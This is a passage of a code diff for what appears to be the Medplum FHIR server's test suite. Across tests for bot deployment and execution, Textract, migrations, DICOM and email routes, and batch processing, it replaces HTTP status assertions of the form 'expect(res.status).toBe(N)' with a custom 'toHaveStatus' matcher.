     expect(mockLambdaClient.commandCalls(ListLayerVersionsCommand)).toHaveLength(1);
@@ -263,7 +263,7 @@ describe('Deploy', () => {
       }
       `,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     expect(mockLambdaClient.commandCalls(GetFunctionCommand)).toHaveLength(2);
     expect(mockLambdaClient.commandCalls(ListLayerVersionsCommand)).toHaveLength(1);
@@ -320,7 +320,7 @@ describe('Deploy', () => {
       `,
         filename: 'updated.js',
       });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     expect(mockLambdaClient.commandCalls(GetFunctionCommand)).toHaveLength(1);
     expect(mockLambdaClient.commandCalls(ListLayerVersionsCommand)).toHaveLength(1);
@@ -346,7 +346,7 @@ describe('Deploy', () => {
       }
       `,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body).toMatchObject(allOk);
 
     expect(mockLambdaClient.commandCalls(GetFunctionCommand)).toHaveLength(2);
@@ -364,7 +364,7 @@ describe('Deploy', () => {
         ...bot,
         timeout: 15,
       });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     // Step 4: Deploy bot again
     const res4 = await request(app)
@@ -379,7 +379,7 @@ describe('Deploy', () => {
       }
       `,
       });
-    // expect(res4.status).toBe(200);
+    // expect(res4).toHaveStatus(200);
     expect(res4.body).toMatchObject(allOk);
 
     // Make sure that timeout was updated
@@ -419,7 +419,7 @@ describe('Deploy', () => {
       .send({
         ...bot,
       });
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
 
     // Step 6: Deploy bot for final time
     const res6 = await request(app)
@@ -434,7 +434,7 @@ describe('Deploy', () => {
       }
       `,
       });
-    expect(res6.status).toBe(200);
+    expect(res6).toHaveStatus(200);
     expect(res6.body).toMatchObject(allOk);
 
     // Make sure that timeout was updated again
@@ -459,13 +459,13 @@ describe('Deploy', () => {
       }
       `,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body).toMatchObject(allOk);
 
     const res3 = await request(app)
       .get(`/fhir/R4/Bot/${bot.id}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body).toMatchObject({
       resourceType: 'Bot',
       name: 'Test Bot',
@@ -496,7 +496,7 @@ describe('Deploy', () => {
         }
         `,
       });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body).toMatchObject(badRequest('Bot timeout exceeds allowed maximum of 900 seconds'));
   });
 
@@ -511,7 +511,7 @@ describe('Deploy', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ code: `export async function handler() { return null; }` });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     mockLambdaClient.resetHistory();
 
@@ -532,7 +532,7 @@ describe('Deploy', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ code: `export async function handler() { return null; }` });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     // Cleanup runs async after the response, so poll until all expected deletes have occurred.
     // Versions 5 and 4 should be kept; 3, 2, 1 deleted.
@@ -559,7 +559,7 @@ describe('Deploy', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ code: `export async function handler() { return null; }` });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     mockLambdaClient.resetHistory();
 
@@ -576,7 +576,7 @@ describe('Deploy', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ code: `export async function handler() { return null; }` });
     // Deploy should still succeed even though cleanup deletion failed.
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     await waitFor(async () => {
       expect(mockLambdaClient.commandCalls(DeleteFunctionCommand)).toHaveLength(1);
     });
@@ -592,7 +592,7 @@ describe('Deploy', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ code: `export async function handler() { return null; }` });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     mockLambdaClient.resetHistory();
 
@@ -609,7 +609,7 @@ describe('Deploy', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ code: `export async function handler() { return null; }` });
     // Deploy should still succeed even though the async cleanup throws.
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     await waitFor(async () => {
       expect(errorSpy).toHaveBeenCalledWith(
@@ -640,7 +640,7 @@ describe('Deploy', () => {
         }
         `,
       });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body).toMatchObject(badRequest('Too many requests'));
   });
 });

--- a/packages/server/src/cloud/aws/deploystreaming.test.ts
+++ b/packages/server/src/cloud/aws/deploystreaming.test.ts
@@ -141,7 +141,7 @@ describe('Deploy Streaming', () => {
         }
         `,
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const bot = res1.body as Bot;
     const name = `medplum-bot-lambda-${bot.id}`;
@@ -159,7 +159,7 @@ describe('Deploy Streaming', () => {
         }
         `,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     expect(mockLambdaClient.commandCalls(GetFunctionCommand)).toHaveLength(2);
     expect(mockLambdaClient.commandCalls(ListLayerVersionsCommand)).toHaveLength(1);
@@ -207,7 +207,7 @@ describe('Deploy Streaming', () => {
         `,
         filename: 'updated.js',
       });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     expect(mockLambdaClient.commandCalls(GetFunctionCommand)).toHaveLength(1);
     expect(mockLambdaClient.commandCalls(ListLayerVersionsCommand)).toHaveLength(1);
@@ -242,7 +242,7 @@ describe('Deploy Streaming', () => {
         runtimeVersion: 'awslambda',
         streamingEnabled: true,
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const bot = res1.body as Bot;
 
@@ -258,7 +258,7 @@ describe('Deploy Streaming', () => {
         }
         `,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     // Verify the zip contents contain streaming-specific code
     const createCall = mockLambdaClient.commandCalls(CreateFunctionCommand)[0];
@@ -304,7 +304,7 @@ describe('Deploy Streaming', () => {
         runtimeVersion: 'awslambda',
         streamingEnabled: false,
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const bot = res1.body as Bot;
 
@@ -320,7 +320,7 @@ describe('Deploy Streaming', () => {
         }
         `,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     // Verify the zip does NOT contain streaming code
     const createCall = mockLambdaClient.commandCalls(CreateFunctionCommand)[0];

--- a/packages/server/src/cloud/aws/execute.test.ts
+++ b/packages/server/src/cloud/aws/execute.test.ts
@@ -71,7 +71,7 @@ describe('Execute', () => {
           }
         `,
       });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
     bot = res.body as Bot;
   });
 
@@ -85,7 +85,7 @@ describe('Execute', () => {
       .set('Content-Type', ContentType.TEXT)
       .set('Authorization', 'Bearer ' + accessToken)
       .send('input');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['content-type']).toBe('text/plain; charset=utf-8');
     expect(res.text).toStrictEqual('input');
   });
@@ -99,7 +99,7 @@ describe('Execute', () => {
         resourceType: 'Patient',
         name: [{ given: ['John'], family: ['Doe'] }],
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['content-type']).toBe('application/fhir+json; charset=utf-8');
   });
 
@@ -111,7 +111,7 @@ describe('Execute', () => {
         resourceType: 'Patient',
         name: [{ given: ['John'], family: ['Doe'] }],
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['content-type']).toBe('application/fhir+json; charset=utf-8');
   });
 
@@ -128,7 +128,7 @@ describe('Execute', () => {
       .set('Content-Type', ContentType.HL7_V2)
       .set('Authorization', 'Bearer ' + accessToken)
       .send(text);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['content-type']).toBe('x-application/hl7-v2+er7; charset=utf-8');
     expect(writeFileSpy).toHaveBeenCalledTimes(1);
 
@@ -154,7 +154,7 @@ describe('Execute', () => {
         name: 'Test Bot',
         code: '',
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     const bot = res1.body as Bot;
 
     // Execute the bot
@@ -163,7 +163,7 @@ describe('Execute', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({});
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
   });
 
   test('Unsupported runtime version', async () => {
@@ -176,7 +176,7 @@ describe('Execute', () => {
         name: 'Test Bot',
         runtimeVersion: 'unsupported',
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     const bot = res1.body as Bot;
 
     // Step 2: Publish the bot
@@ -192,7 +192,7 @@ describe('Execute', () => {
         }
         `,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     // Step 3: Execute the bot
     const res3 = await request(app)
@@ -200,7 +200,7 @@ describe('Execute', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({});
-    expect(res3.status).toBe(400);
+    expect(res3).toHaveStatus(400);
   });
 
   test('Get function name', async () => {
@@ -228,7 +228,7 @@ describe('Execute', () => {
       .set('Content-Type', ContentType.TEXT)
       .set('Authorization', 'Bearer ' + accessToken)
       .send('input');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['content-type']).toBe('text/plain; charset=utf-8');
     expect(res.text).toStrictEqual('input');
   });
@@ -245,7 +245,7 @@ describe('Execute', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({});
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject(outcome);
   });
 });

--- a/packages/server/src/cloud/aws/executestreaming.test.ts
+++ b/packages/server/src/cloud/aws/executestreaming.test.ts
@@ -98,7 +98,7 @@ describe('Execute', () => {
           }
         `,
       });
-    expect(streamingRes.status).toBe(201);
+    expect(streamingRes).toHaveStatus(201);
     streamingBot = streamingRes.body as Bot;
   });
 
@@ -114,7 +114,7 @@ describe('Execute', () => {
         .set('Accept', 'text/event-stream')
         .set('Authorization', 'Bearer ' + accessToken)
         .send('input');
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       expect(res.headers['content-type']).toBe('text/event-stream');
 
       const events = res.text.split('\n\n').filter((e) => e.startsWith('data: '));
@@ -130,7 +130,7 @@ describe('Execute', () => {
         .set('Accept', 'text/event-stream')
         .set('Authorization', 'Bearer ' + accessToken)
         .send({ message: 'hello' });
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       expect(res.headers['content-type']).toBe('text/event-stream');
 
       const events = res.text.split('\n\n').filter((e) => e.startsWith('data: '));
@@ -162,7 +162,7 @@ describe('Execute', () => {
         .set('Accept', 'text/event-stream')
         .set('Authorization', 'Bearer ' + accessToken)
         .send('input');
-      expect(res.status).toBe(400);
+      expect(res).toHaveStatus(400);
       expect(res.body.issue[0].details.text).toContain('Failed to parse streaming headers');
     });
 
@@ -190,7 +190,7 @@ describe('Execute', () => {
         .set('Accept', 'text/event-stream')
         .set('Authorization', 'Bearer ' + accessToken)
         .send('input');
-      expect(res.status).toBe(400);
+      expect(res).toHaveStatus(400);
       expect(res.body.issue[0].details.text).toContain('Lambda error: Unhandled');
     });
 
@@ -228,7 +228,7 @@ describe('Execute', () => {
         .set('Accept', 'text/event-stream')
         .set('Authorization', 'Bearer ' + accessToken)
         .send('input');
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       expect(res.headers['content-type']).toBe('text/event-stream');
       expect(res.text).toContain('data: Split test');
     });
@@ -269,7 +269,7 @@ describe('Execute', () => {
         .set('Accept', 'text/event-stream')
         .set('Authorization', 'Bearer ' + accessToken)
         .send('input');
-      expect(res.status).toBe(400);
+      expect(res).toHaveStatus(400);
       expect(res.headers['content-type']).toBe('application/json');
       expect(res.body.resourceType).toBe('OperationOutcome');
       expect(res.body.issue[0].details.text).toBe('Test error');
@@ -307,7 +307,7 @@ describe('Execute', () => {
         .set('Accept', 'text/event-stream')
         .set('Authorization', 'Bearer ' + accessToken)
         .send('input');
-      expect(res.status).toBe(500);
+      expect(res).toHaveStatus(500);
       expect(res.headers['content-type']).toBe('application/json');
       expect(res.body).toMatchObject({ errorType: 'Error', errorMessage: 'Something failed' });
     });
@@ -341,7 +341,7 @@ describe('Execute', () => {
         .set('Accept', 'text/event-stream')
         .set('Authorization', 'Bearer ' + accessToken)
         .send('input');
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       expect(res.body).toStrictEqual({}); // since content-type is not application/json, supertest does not parse the body and leaves it as an empty object
       expect(JSON.parse(res.text)).toStrictEqual({ chunks: [{ chunk: 1 }, { chunk: 2 }] });
     });

--- a/packages/server/src/cloud/aws/textract.test.ts
+++ b/packages/server/src/cloud/aws/textract.test.ts
@@ -65,7 +65,7 @@ describe('AWS Textract', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('Hello world');
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     // Step 2: Create a Media
     const res2 = await request(app)
@@ -80,13 +80,13 @@ describe('AWS Textract', () => {
           url: 'Binary/' + res1.body.id,
         },
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     // Step 3: Submit the Media to Textract
     const res3 = await request(app)
       .post(`/fhir/R4/Media/${res2.body.id}/$aws-textract`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.Blocks).toBeDefined();
   });
 
@@ -107,7 +107,7 @@ describe('AWS Textract', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('Hello world');
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     // Step 2: Create a Media
     const res2 = await request(app)
@@ -119,13 +119,13 @@ describe('AWS Textract', () => {
         status: 'completed',
         content: { contentType: 'application/pdf', url: 'Binary/' + res1.body.id },
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     // Step 3: Submit the Media to Textract
     const res3 = await request(app)
       .post(`/fhir/R4/Media/${res2.body.id}/$aws-textract`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     // All pages of Blocks should be present (fails on buggy code: only "page one" returned)
     const texts = res3.body.Blocks.map((b: { Text?: string }) => b.Text);
@@ -145,7 +145,7 @@ describe('AWS Textract', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('Hello world');
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     // Step 2: Create a Media
     const res2 = await request(app)
@@ -160,14 +160,14 @@ describe('AWS Textract', () => {
           url: 'Binary/' + res1.body.id,
         },
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     // Step 3: Submit the Media to Textract
     const res3 = await request(app)
       .post(`/fhir/R4/Media/${res2.body.id}/$aws-textract`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ comprehend: true });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.Blocks).toBeDefined();
   });
 
@@ -180,7 +180,7 @@ describe('AWS Textract', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('Hello world from DocumentReference');
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     // Step 2: Create a DocumentReference
     const res2 = await request(app)
@@ -203,13 +203,13 @@ describe('AWS Textract', () => {
           reference: 'Patient/test-patient',
         },
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     // Step 3: Submit the DocumentReference to Textract
     const res3 = await request(app)
       .post(`/fhir/R4/DocumentReference/${res2.body.id}/$aws-textract`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.Blocks).toBeDefined();
   });
 
@@ -222,7 +222,7 @@ describe('AWS Textract', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('Hello world from DocumentReference with Comprehend');
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     // Step 2: Create a DocumentReference
     const res2 = await request(app)
@@ -245,14 +245,14 @@ describe('AWS Textract', () => {
           reference: 'Patient/test-patient',
         },
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     // Step 3: Submit the DocumentReference to Textract with Comprehend
     const res3 = await request(app)
       .post(`/fhir/R4/DocumentReference/${res2.body.id}/$aws-textract`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ comprehend: true });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.Blocks).toBeDefined();
   });
 
@@ -279,13 +279,13 @@ describe('AWS Textract', () => {
           reference: 'Patient/test-patient',
         },
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     // Try to submit the DocumentReference to Textract
     const res2 = await request(app)
       .post(`/fhir/R4/DocumentReference/${res1.body.id}/$aws-textract`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue[0].details.text).toBe('DocumentReference attachment has no URL');
   });
 });

--- a/packages/server/src/database-migration.test.ts
+++ b/packages/server/src/database-migration.test.ts
@@ -712,12 +712,12 @@ describe('Database migrations', () => {
           const queueAdd = getQueueAddSpy();
 
           if (expectedToFailOrPass === 'pass') {
-            expect(res2.status).toStrictEqual(202);
+            expect(res2).toHaveStatus(202);
             expect(res2.headers['content-location']).toBeDefined();
 
             expect(queueAdd).toHaveBeenCalledTimes(1);
           } else {
-            expect(res2.status).toStrictEqual(400);
+            expect(res2).toHaveStatus(400);
 
             const queueAdd = getQueueAddSpy();
             expect(queueAdd).not.toHaveBeenCalled();
@@ -735,7 +735,7 @@ describe('Database migrations', () => {
             .type('json')
             .send({ dataVersion });
 
-          expect(res1.status).toStrictEqual(400);
+          expect(res1).toHaveStatus(400);
           expect(res1.headers['content-location']).not.toBeDefined();
           expect(res1.body).toMatchObject(badRequest('dataVersion must be an integer'));
         }
@@ -755,7 +755,7 @@ describe('Database migrations', () => {
         // nothing to do, so no AsyncJob was created and no content-location header
         // should be set
         expect(res1.body).toMatchObject(allOk);
-        expect(res1.status).toStrictEqual(200);
+        expect(res1).toHaveStatus(200);
         expect(res1.headers['content-location']).not.toBeDefined();
       });
     });
@@ -773,7 +773,7 @@ describe('Database migrations', () => {
           .type('json')
           .send({ dataVersion: 1337 });
 
-        expect(res1.status).toStrictEqual(200);
+        expect(res1).toHaveStatus(200);
         expect(res1.body).toMatchObject(allOk);
         expect(mockMarkPostDeployMigrationCompleted).toHaveBeenCalledTimes(1);
       });
@@ -785,7 +785,7 @@ describe('Database migrations', () => {
           .type('json')
           .send({ dataVersion });
 
-        expect(res1.status).toStrictEqual(400);
+        expect(res1).toHaveStatus(400);
         expect(res1.body).toMatchObject(badRequest('dataVersion must be an integer'));
       });
     });
@@ -812,7 +812,7 @@ describe('Database migrations', () => {
           .type('json');
 
         expect(queueAddSpy).toHaveBeenCalledTimes(0);
-        expect(res1.status).toStrictEqual(200);
+        expect(res1).toHaveStatus(200);
         expect(res1.headers['content-location']).not.toBeDefined();
       });
 
@@ -843,7 +843,7 @@ describe('Database migrations', () => {
           },
         });
 
-        expect(res1.status).toStrictEqual(202);
+        expect(res1).toHaveStatus(202);
         expect(res1.headers['content-location']).toBeDefined();
       });
     });

--- a/packages/server/src/dicom/routes.test.ts
+++ b/packages/server/src/dicom/routes.test.ts
@@ -25,7 +25,7 @@ describe('DICOM Routes', () => {
     const res = await request(app)
       .get(`/dicom/PS3/studies`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Create study', async () => {
@@ -34,14 +34,14 @@ describe('DICOM Routes', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({});
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Get study', async () => {
     const res = await request(app)
       .get(`/dicom/PS3/studies/123`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Update study', async () => {
@@ -50,83 +50,83 @@ describe('DICOM Routes', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.JSON)
       .send({});
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Get rendered study', async () => {
     const res = await request(app)
       .get(`/dicom/PS3/studies/123/rendered`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Get all series', async () => {
     const res = await request(app)
       .get(`/dicom/PS3/studies/123/series`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Get series', async () => {
     const res = await request(app)
       .get(`/dicom/PS3/studies/123/series/456`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Get rendered series', async () => {
     const res = await request(app)
       .get(`/dicom/PS3/studies/123/series/456/rendered`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Get series metadata', async () => {
     const res = await request(app)
       .get(`/dicom/PS3/studies/123/series/456/metadata`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Get series instances', async () => {
     const res = await request(app)
       .get(`/dicom/PS3/studies/123/series/456/instances`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Get instance', async () => {
     const res = await request(app)
       .get(`/dicom/PS3/studies/123/series/456/instances/789`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Get rendered instance', async () => {
     const res = await request(app)
       .get(`/dicom/PS3/studies/123/series/456/instances/789/rendered`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Get instance metadata', async () => {
     const res = await request(app)
       .get(`/dicom/PS3/studies/123/series/456/instances/789/metadata`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Get frame', async () => {
     const res = await request(app)
       .get(`/dicom/PS3/studies/123/series/456/instances/789/frames/0`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Get bulk metadata', async () => {
     const res = await request(app)
       .get(`/dicom/PS3/bulkdataUriReference`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 });

--- a/packages/server/src/email/routes.test.ts
+++ b/packages/server/src/email/routes.test.ts
@@ -53,7 +53,7 @@ describe('Email API Routes', () => {
       subject: 'Subject',
       text: 'Body',
     });
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
     expect(mockSESv2Client.send.callCount).toBe(0);
   });
 
@@ -68,7 +68,7 @@ describe('Email API Routes', () => {
         subject: 'Subject',
         text: 'Body',
       });
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
     expect(res.body.issue[0].details.text).toBe('Only project administrators can send emails');
   });
 
@@ -86,7 +86,7 @@ describe('Email API Routes', () => {
         subject: 'Subject',
         text: 'Body',
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Email feature is not enabled for this project');
   });
 
@@ -111,7 +111,7 @@ describe('Email API Routes', () => {
           subject: 'Subject',
           text: 'Body',
         });
-      expect(res.status).toBe(400);
+      expect(res).toHaveStatus(400);
       expect(res.body.issue[0].details.text).toBe('Email is not configured on this server. Set up SMTP or AWS SES.');
     } finally {
       // Restore config
@@ -127,7 +127,7 @@ describe('Email API Routes', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('hello');
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Send email as project admin', async () => {
@@ -141,7 +141,7 @@ describe('Email API Routes', () => {
         subject: 'Subject',
         text: 'Body',
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     expect(mockSESv2Client.send.callCount).toBe(1);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(1);
@@ -179,7 +179,7 @@ describe('Email API Routes', () => {
         subject: 'Subject',
         text: 'Body',
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     expect(mockCreateTransport).toHaveBeenCalledWith(
       expect.objectContaining({ host: 'smtp.project.example.com', port: 587, secure: false })
@@ -203,7 +203,7 @@ describe('Email API Routes', () => {
         subject: 'Subject',
         text: 'Body',
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Error sending email: BadRequestException: Illegal address');
   });
 });

--- a/packages/server/src/fhir/batch.test.ts
+++ b/packages/server/src/fhir/batch.test.ts
@@ -99,7 +99,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Practitioner' });
-    expect(res1.status).toStrictEqual(201);
+    expect(res1).toHaveStatus(201);
     expect(res1.body.resourceType).toStrictEqual('Practitioner');
     const practitioner = res1.body as WithId<Practitioner>;
 
@@ -108,7 +108,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient' });
-    expect(res2.status).toStrictEqual(201);
+    expect(res2).toHaveStatus(201);
     expect(res2.body.resourceType).toStrictEqual('Patient');
     const toDelete = res2.body as WithId<Patient>;
 
@@ -172,7 +172,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(batch);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toStrictEqual('Bundle');
 
     const results = res.body as Bundle;
@@ -221,7 +221,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Practitioner' });
-    expect(res1.status).toStrictEqual(201);
+    expect(res1).toHaveStatus(201);
     expect(res1.body.resourceType).toStrictEqual('Practitioner');
     const practitioner = res1.body as WithId<Practitioner>;
 
@@ -230,7 +230,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient' });
-    expect(res2.status).toStrictEqual(201);
+    expect(res2).toHaveStatus(201);
     expect(res2.body.resourceType).toStrictEqual('Patient');
     const toDelete = res2.body as WithId<Patient>;
 
@@ -242,7 +242,7 @@ describe('Batch and Transaction processing', () => {
         resourceType: 'RelatedPerson',
         patient: { reference: getReferenceString(toDelete) },
       });
-    expect(res3.status).toStrictEqual(201);
+    expect(res3).toHaveStatus(201);
     expect(res3.body.resourceType).toStrictEqual('RelatedPerson');
     const relatedPerson = res3.body as WithId<RelatedPerson>;
 
@@ -314,7 +314,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(transaction);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toStrictEqual('Bundle');
 
     const results = res.body as Bundle;
@@ -378,7 +378,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Practitioner' });
-    expect(res1.status).toStrictEqual(201);
+    expect(res1).toHaveStatus(201);
     expect(res1.body.resourceType).toStrictEqual('Practitioner');
     const practitioner = res1.body as WithId<Practitioner>;
 
@@ -387,7 +387,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient' });
-    expect(res2.status).toStrictEqual(201);
+    expect(res2).toHaveStatus(201);
     expect(res2.body.resourceType).toStrictEqual('Patient');
     const toDelete = res2.body as WithId<Patient>;
 
@@ -452,7 +452,7 @@ describe('Batch and Transaction processing', () => {
